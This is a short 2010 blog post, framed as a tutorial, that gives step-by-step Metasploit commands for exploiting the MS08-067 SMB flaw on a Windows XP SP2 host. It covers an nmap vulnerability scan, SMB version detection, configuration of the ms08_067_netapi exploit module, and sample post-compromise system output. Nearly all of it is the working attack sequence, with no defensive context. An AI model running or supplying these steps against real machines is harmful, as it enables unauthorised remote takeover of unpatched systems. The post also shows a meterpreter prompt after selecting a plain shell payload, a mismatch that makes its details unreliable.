Tuesday, March 9, 2010

Tutorial: Exploiting Windows XP SP2 with MS08-067 Vulnerability

Target: 192.168.1.50 (Windows XP SP2 English)
Yours: 192.168.1.252 (BackTrack 3 with Metasploit 3.x)

Step 1: Scan for SMB Vulnerability (netapi = MS08-067)

nmap -sS --script=smb-check-vulns 192.168.1.50

Step 2: Check the SMB Version (O/S, SP level & Language)

cd /pentest/exploits/msf3
./msfconsole

msf > use scanner/smb/smb_version
msf > set RHOSTS 192.168.1.50
msf > run

Step 3: Exploit with MS08-067 module

msf > use windows/smb/ms08_067_netapi
msf > set PAYLOAD windows/shell/bind_tcp
msf > set RHOST 192.168.1.50
msf > show targets
msf > set TARGET 3 (depends on step# 2)
msf > run

meterpreter > sysinfo
Computer: LON-CL1
OS : Windows XP (Build 2600, Service Pack 2).
Arch : x86
Language: en_US
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)